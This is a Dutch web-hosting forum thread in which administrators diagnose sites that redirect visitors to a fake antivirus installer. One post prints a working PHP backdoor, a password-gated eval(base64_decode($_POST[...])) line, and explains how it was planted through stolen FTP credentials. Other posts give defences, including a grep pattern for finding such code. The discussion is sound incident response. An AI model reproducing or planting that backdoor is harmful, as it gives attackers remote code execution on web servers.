Likes Likes:  0
Resultaten 1 tot 15 van de 28
Pagina 1 van de 2 1 2 LaatsteLaatste
Geen
  1. #1
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    7 Berichten
    Ingeschreven
    01/08/07

    Locatie
    Arnhem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter

    Internet AntiVirus Pro / Trojan / etc. op server?

    Hi,

    Ik heb een apache 2 + php5 webserver waar een aantal sites op lopen. Nu heb ik van een aantal klanten te horen gekregen dat wanneer ze hun eigen site openen ze een soort van windows-security-screen krijgen, waar als men op OK klikt internet antivirus pro gaat installeren.

    Nu vraag ik me werkelijk af. Waar komt dit vandaan? Ik heb de hele sites af zitten zoeken of er wellicht ergens een iframe oid geinsert was in die site, maar ik kan werkelijk niets vinden. Toch zit het erop, want als ik met IE naar een paar sites ga, krijg ik af en toe (niet altijd) die melding ook.

    Ik heb ook al apache na zitten zoeken of er ergens een config oid gewijzigd was, maar ik raak echt het spoor bijster. Weten jullie hier iets?

  2. #2
    Internet AntiVirus Pro / Trojan / etc. op server?
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    misschien dat ze zelf al geinfecteerd waren met shareware die popups spuugt
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  3. #3
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    676 Berichten
    Ingeschreven
    22/01/09

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Het kan zijn dat er ranzige zooi (code) via 1 van de php appjes geinjecteerd in de index van de desbetreffende website (kan ook een worm zijn wat ondertussen alle sites/indexen geinfecteerd heeft) en dat de bezoekers nu een virus geinstalleerd hebben i.p.v een virus scanner.
    Wat staat er in die index pages, wat wordt er aangeroepen?
    Wat staat er in je logs ?

    /edit; optie van Mikey kan het ook nog zijn

  4. #4
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    1.712 Berichten
    Ingeschreven
    03/01/07

    Locatie
    Winschoten / Groningen

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    Naam: Kobus Draijer
    Bedrijf: IC Hosting
    URL: www.ic-hosting.nl
    Registrar SIDN: ja
    KvK nummer: 02079831
    Ondernemingsnummer: nvt
    TrustCloud: ichosting

    Wees ook voorzichtig met Antivirus PRO, want dit is zelf een virus namelijk
    Controleer ook even de versie van Proftpd

  5. #5
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    7 Berichten
    Ingeschreven
    01/08/07

    Locatie
    Arnhem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Ik heb geprobeerd vanaf een nieuw geinstalleerde laptop en daar kreeg ik die melding ook.

    Heb alle index-en al nagelopen, maar kan serieus niets raars vinden...

    ProFTPD Version 1.3.1

    Ik draai debian:
    Linux version 2.6.26-2-686 (Debian 2.6.26-17lenny1) (dannf@debian.org) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Sun Jul 26 21:25:33 UTC 2009

  6. #6
    Internet AntiVirus Pro / Trojan / etc. op server?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Ik denk dat je een worm hebt..
    scan even met avg-free
    link: http://free.avg.com/download?prd=afl
    Ook voor Debian.

  7. #7
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    676 Berichten
    Ingeschreven
    22/01/09

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Zijn er users bijgekomen of bruteforces op user passwds geweest ? (check ssh ook effe)

  8. #8
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    2.731 Berichten
    Ingeschreven
    20/05/05

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    6 Berichten zijn liked



    Wat staat er (vaak bovenaan) in de body van index.???

  9. #9
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    1.712 Berichten
    Ingeschreven
    03/01/07

    Locatie
    Winschoten / Groningen

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    Naam: Kobus Draijer
    Bedrijf: IC Hosting
    URL: www.ic-hosting.nl
    Registrar SIDN: ja
    KvK nummer: 02079831
    Ondernemingsnummer: nvt
    TrustCloud: ichosting

    Vermoedelijk een iframe in de pagina.
    Tip: update proftpd ook even. 1.3.1 schijnt een lek te hebben waardoor onverlaten simpel toegang kunnen krijgen tot de server. Misschien ook door dit veroorzaakt.

    http://www.saintcorporation.com/cgi-...ct_color=&tag=

  10. #10
    Internet AntiVirus Pro / Trojan / etc. op server?
    geregistreerd gebruiker
    549 Berichten
    Ingeschreven
    06/10/06

    Locatie
    Zuidhorn

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    3 Berichten zijn liked


    Naam: Rudy
    Bedrijf: Brinkman IT
    Functie: Directeur/eigenaar
    URL: www.brinkhost.nl
    KvK nummer: 02069024
    Ondernemingsnummer: nvt
    View brinkman.it's profile on LinkedIn

    Een klant van mij had recent een soortgelijk verschijnsel. In eerste instantie zocht hij "uiteraard" de oorzaak bij mij, maar het bleek dat de webdesigner die voor hem werkte een PC had die geïnfecteerd was met een worm/trojan die via de webdesigners' FTP-client alle sites waar hij aan gewerkt had de afgelopen tijd geïnfecteerd had. Helaas kwamen ze pas zó laat er achter, dat zelfs de backups van zijn site geen oplossing meer boden en de site door de webdesigner helemaal opnieuw aangemaakt moest worden.

    Als je in de index.html/php niets kan vinden (geen iframe tags ed.) kun je ook eens kijken of die klanten --gezien het gedrag van de sties-- wellicht "tellertjes" op hun pagina's gebruiken die deze pop-ups genereren. Dat heb ik al zeer vaak gezien. En maar niet begrijpen dat ze dus dat gedrag, van de site, zelf veroorzaakt hebben

    Als de sites geïnfecteerd zijn, en je server ook, is de kans groot dat ze binnenkort ook als 'aanvalssite' worden gerapporteerd. Het is dus zaak om in elk geval snel en goed onderzoek te doen naar wat er aan de hand is.
    Brinkman.IT - Hosting & Design - https://www.brinkhost.nl/

  11. #11
    Internet AntiVirus Pro / Trojan / etc. op server?
    3.810 Berichten
    Ingeschreven
    16/05/04

    Locatie
    Middelburg

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    130 Berichten zijn liked


    Registrar SIDN: Ja

    Deze virussen zijn inmiddels beter geworden en nestelen zich in het begin via een FTP account, daar wordt aan een PHP bestand iets als volgt toegevoegd:

    Code:
    <?php /*fb15fb2bc492861480055dc512493c04*/if(isset($_POST["p"])&&$_POST["p"]=="291918b850f7554dd834d671a114abdf"){eval(base64_decode($_POST["c"]));exit;}/*fb15fb2bc492861480055dc512493c04*/ ?>
    Nu wordt vaak ergens middein in de nacht dat script aangeroepen waarna er malafide PHP code wordt gestart die je Apache requests af vangt en hierna redirects (random!!) begint te doen. Zo ver ik weet alleen bij Internet Exploreren en niet bij FF. Tevens wordt er een Cookie geplaatst die bij houdt wie er al eens geredirect is en hem niet nogmaals redirect.

    Waar herken je dit aan (niet alle symptomem komen altijd voor):
    * Load van de machine komt rond de 10 te hangen
    * Er draaien malafide processen
    * Er draait een "httpd" proces erg lang

    Zoek eens in je user files naar "base64_decode", dan zal je vast iets vinden.

    Nu heb ik inmiddels wat vallen gezet voor dit virus en al wat van deze malafide code afgevangen, echter is me nog niet 100% duidelijk hoe ze te werk gaan.

    Dit proces kan dus ALLE Apache requests afvangen, niet alleen van die website. Nu zal je zeggen: Hoe kan dat?

    Dit komt door een al lang slepende discussie tussen Apache en PHP (sinds 2003!). Apache geeft aan alle modules (ook CGI!) zijn descriptors mee (zoals socket, logfiles, etc, etc), PHP hoort deze te cleanen voor gebruik te maken van oa shell_exec, system en andere proces-functies, maar dat gebeurd niet, hierdoor kan je vanuit PHP controle krijgen over diverse Apache functionaliteiten en dus ook requests af vangen.

    Vorig jaar heb ik met een collega van mij dit al ontdekt (Exim bond soms aan poort 80), maar een patch hiervoor is lastig. We hebben er inmiddels een gevonden, maar het implementeren is lastiger dan gedacht.

    Apache zegt dat PHP niet netjes opgeruimd en PHP zegt dat het vanuit Apache nooit door mag worden gegeven, dit wellus-nietus spelletje duurt nu al 6 jaar.

    Ik vroeg me al af wanneer de eerste exploits zouden komen voor dit lek en die spelen nu dus op.

    Wees gewaarschuwd! Wat tot op heden heb ik hier nog steeds geen fix/oplossing voor.

    Zie ook: http://blog.unmaskparasites.com/2009...eta-redirects/

    De meeste blogposts die je hier over vindt zijn allemaal van webmasters, die snappen er vaak weinig van. Maar de bron is dus één FTP account waar de gegevens van gestolen zijn, daarna kunnen er redirects op de gehele server plaats vinden.
    Laatst gewijzigd door Wido; 13/08/09 om 21:24.

  12. #12
    Internet AntiVirus Pro / Trojan / etc. op server?
    Ouwe rot, 52 Jaar
    1.901 Berichten
    Ingeschreven
    24/08/02

    Locatie
    Gaanderen

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    KvK nummer: 09153441

    Wido ik heb jou verhaal gelezen, ik wist ook dat dit bestond maar waarom het kon lees ik nu van jou.
    Een jaar geleden heb ik dit ook gehad, iemand kon met de "gestolen" gegevens via FTP Apache gekke dingen laten doen.
    Ik heb toen in die tijd weken lopen zoeken..
    Wat er gebeurde was dat iemand met een gehackte FTP account een script plaatste en daarmee rare codes toevoegde aan Apache en daarna werd het script meteen weer verwijderd.
    De oplossing was simpel toen ik het gevonden had, openbase dir en safemode aan op alle accounts.
    Vanaf die tijd nooit geen problemen meer gehad.

  13. #13
    Internet AntiVirus Pro / Trojan / etc. op server?
    3.810 Berichten
    Ingeschreven
    16/05/04

    Locatie
    Middelburg

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    130 Berichten zijn liked


    Registrar SIDN: Ja

    safe_mode is natuurlijk niet echt klantvriendelijk en ook een symptoombestrijding, geen oplossing.

    Het werkt wel, maar je maakt wel heel veel code van je klanten kapot met safe_mode aan.

  14. #14
    Internet AntiVirus Pro / Trojan / etc. op server?
    AristoWeb/Eliveldnetworks
    263 Berichten
    Ingeschreven
    02/04/05

    Locatie
    Rekken

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: 08124311
    Ondernemingsnummer: 08165848

    Probleem heel herkenbaar. Dank je voor de uitleg Wido.
    Op meerdere servers hier het probleem gehad:
    Je merkt het aan iframes met redirects naar de raarste sites.
    En ze komen binnen met ftp.
    We hebben onze servers nu omgezet naar suphp, zodat je in ieder geval het bij één account tegelijk houdt.
    Verder direct ftpgegevens van de klant gewijzigd (is niet zo leuk voor ze, maar waarschijnijk is hun eigen PC ook besmet). Met deze maatregelen is het een stuk minder erg geworden, maar.. niet te vroeg gejuicht, ze zijn slim die rakkers.

    Vr.gr. Eef

  15. #15
    Internet AntiVirus Pro / Trojan / etc. op server?
    3.810 Berichten
    Ingeschreven
    16/05/04

    Locatie
    Middelburg

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    130 Berichten zijn liked


    Registrar SIDN: Ja

    Wachtwoorden wijzigen werkt niet echt, wat ik heb gemerkt is dat die virussen gewoon FTP gegevens sniffen en ze uit de opgeslagen wachtwoorden halen van de FTP clients.

    Met suPHP kan je in ieder geval zien onder welk account het draait (Wij gebruiken mod_ruid), dat is een stuk makkelijker zoeken.

    Wat je ook kan doen:

    Code:
    grep -R "eval(base64_decode" /home
    Het bovenstaande is een ZWAAR commando, maar daarmee moet je eventuele botjes wel vinden.

Pagina 1 van de 2 1 2 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics